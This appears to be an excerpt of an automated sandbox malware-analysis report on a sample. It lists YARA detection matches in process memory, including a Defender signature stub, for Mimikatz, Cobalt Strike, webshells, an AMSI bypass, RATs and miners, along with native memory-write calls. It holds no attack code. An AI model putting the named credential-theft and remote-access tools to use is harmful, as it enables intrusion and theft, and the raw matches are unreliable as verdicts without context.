Source: 0000000B.00000003.18322267156.0000021B5F6D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 0000000B.00000003.18278226414.0000021B5E924000.00000004.00000001.sdmp, type: MEMORY Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 0000000B.00000003.18266771415.0000021B5F4C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 0000000B.00000003.18266771415.0000021B5F4C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_obfuscated_encoding date = 2021/04/18, author = Arnim Rupp, description = PHP webshell obfuscated by encoding, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000B.00000003.18266771415.0000021B5F4C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 0000000B.00000003.18266771415.0000021B5F4C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_psh date = 2017-02-09, hash1 = 5cc6c7f1aa75df8979be4a16e36cece40340c6e192ce527771bdd6463253e46f, author = Florian Roth, description = Metasploit Payloads - file msf-psh.vba, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp, type: MEMORY Matched rule: Trojan_Win32_PlaKeylog_B author = Microsoft, description = Keylogger component, activity_group = Platinum, version = 1.0, unpacked_sample_sha1 = 6a1412daaa9bdc553689537df0a004d44f8a45fd, last_modified = 2016-04-12, original_sample_sha1 = 0096a3e0c97b85ca75164f48230ae530c94a2b77
Source: 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp, type: MEMORY Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 0000000B.00000003.18292104164.0000021B5EFDB000.00000004.00000001.sdmp, type: MEMORY Matched rule: ZxShell_Jul17 date = 2017-07-08, hash1 = 5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16, author = Florian Roth, description = Detects a ZxShell - CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000B.00000003.18260963344.0000021B5FB33000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18260963344.0000021B5FB33000.00000004.00000001.sdmp, type: MEMORY Matched rule: PUA_CryptoMiner_Jan19_1 date = 2019-01-31, hash1 = ede858683267c61e710e367993f5e589fcb4b4b57b09d023a67ea63084c54a05, author = Florian Roth, description = Detects Crypto Miner strings, reference = Internal Research
Source: 0000000B.00000003.18273280892.0000021B5F922000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18292386350.0000021B5F01C000.00000004.00000001.sdmp, type: MEMORY Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 0000000B.00000003.18286937753.0000021B5E799000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 0000000B.00000003.18286937753.0000021B5E799000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 0000000B.00000003.18300431925.0000021B5E6BC000.00000004.00000001.sdmp, type: MEMORY Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 0000000B.00000003.18309993553.0000021B5F514000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 0000000B.00000003.18299369351.0000021B5F922000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18309596574.0000021B5F4C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 0000000B.00000003.18309596574.0000021B5F4C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_obfuscated_encoding date = 2021/04/18, author = Arnim Rupp, description = PHP webshell obfuscated by encoding, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000B.00000003.18309596574.0000021B5F4C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 0000000B.00000003.18309596574.0000021B5F4C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 0000000B.00000003.18274964838.0000021B5EE90000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18291811520.0000021B5EF98000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18293242978.0000021B5FEA2000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 0000000B.00000003.18293242978.0000021B5FEA2000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 0000000B.00000003.18293242978.0000021B5FEA2000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18293242978.0000021B5FEA2000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 0000000B.00000003.18295295594.0000021B5F05F000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 0000000B.00000003.18295295594.0000021B5F05F000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 0000000B.00000003.18295295594.0000021B5F05F000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 0000000B.00000003.18295295594.0000021B5F05F000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_known_webshell date = 2021/01/09, author = Arnim Rupp, description = Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 7b6471774d14510cf6fa312a496eed72b614f6fc
Source: 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp, type: MEMORY Matched rule: Oilrig_IntelSecurityManager date = 2018-01-19, author = Eyal Sela, description = Detects OilRig malware, reference = Internal Research
Source: 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18308889341.0000021B5F85C000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: PoisonIvy_3 filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, cape_type = PoisonIvy Payload, ref = http://malwareconfig.com/stats/PoisonIvy
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: Msfpayloads_msf_psh date = 2017-02-09, hash1 = 5cc6c7f1aa75df8979be4a16e36cece40340c6e192ce527771bdd6463253e46f, author = Florian Roth, description = Metasploit Payloads - file msf-psh.vba, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: HackTool_Samples description = Hacktool, score =
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: Ammyy_Admin_AA_v3 date = 2014/12/22, hash2 = 07539abb2623fe24b9a05e240f675fa2d15268cb, author = Florian Roth, description = Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe, reference = http://goo.gl/gkAg2E, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = b130611c92788337c4f6bb9e9454ff06eb409166
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: IronPanda_Malware_Htran date = 2015-09-16, author = Florian Roth, description = Iron Panda Malware Htran, reference = https://goo.gl/E4qia9, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 7903f94730a8508e9b272b3b56899b49736740cea5037ea7dbb4e690bcaf00e7
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = file
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: HackTool_MSIL_SharPersist_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 98ecf58d48a3eae43899b45cec0fc6b7
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: PoisonIvy_3 filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, cape_type = PoisonIvy Payload, ref = http://malwareconfig.com/stats/PoisonIvy
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: CVE_2018_4878_0day_ITW Description = This signature is mostly public sourced and detects an in-the-wild exploit for CVE-2018-4878., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Deletes files inside the Windows folder
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File deleted: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\1.1.18500.10_to_1.1.18600.4_mpengine.dll._p
Creates files inside the system directory
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: String function: 00401352 appears 41 times
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: String function: 00007FF7E3050D88 appears 41 times
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: String function: 00007FF7E3050DB4 appears 56 times
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: String function: 00007FF7E30ABAAC appears 36 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022C4C7D NtWriteVirtualMemory,K32GetDeviceDriverBaseNameA, 6_2_022C4C7D
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022BDB60 NtAllocateVirtualMemory, 6_2_022BDB60
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022BCF55 NtWriteVirtualMemory,LoadLibraryA, 6_2_022BCF55
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022C45A3 NtProtectVirtualMemory, 6_2_022C45A3
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022C0C06 NtWriteVirtualMemory,LoadLibraryA, 6_2_022C0C06
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022C010B NtWriteVirtualMemory, 6_2_022C010B
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022C25FC NtWriteVirtualMemory, 6_2_022C25FC
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022B07F5 NtWriteVirtualMemory, 6_2_022B07F5
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022BD1D3 NtWriteVirtualMemory,LoadLibraryA, 6_2_022BD1D3
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E305C444 NtQueryInformationProcess,NtQueryInformationProcess,FindCloseChangeNotification,CloseHandle, 18_2_00007FF7E305C444
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E3065B80 ReadFile,FlushFileBuffers,SetEndOfFile,NtSetInformationFile, 18_2_00007FF7E3065B80
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E3059FF0 NtSetInformationFile, 18_2_00007FF7E3059FF0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E3065DB4 NtQueryInformationFile,NtQueryInformationFile,RtlNtStatusToDosError, 18_2_00007FF7E3065DB4
PE file contains executable resources (Code or Archives)
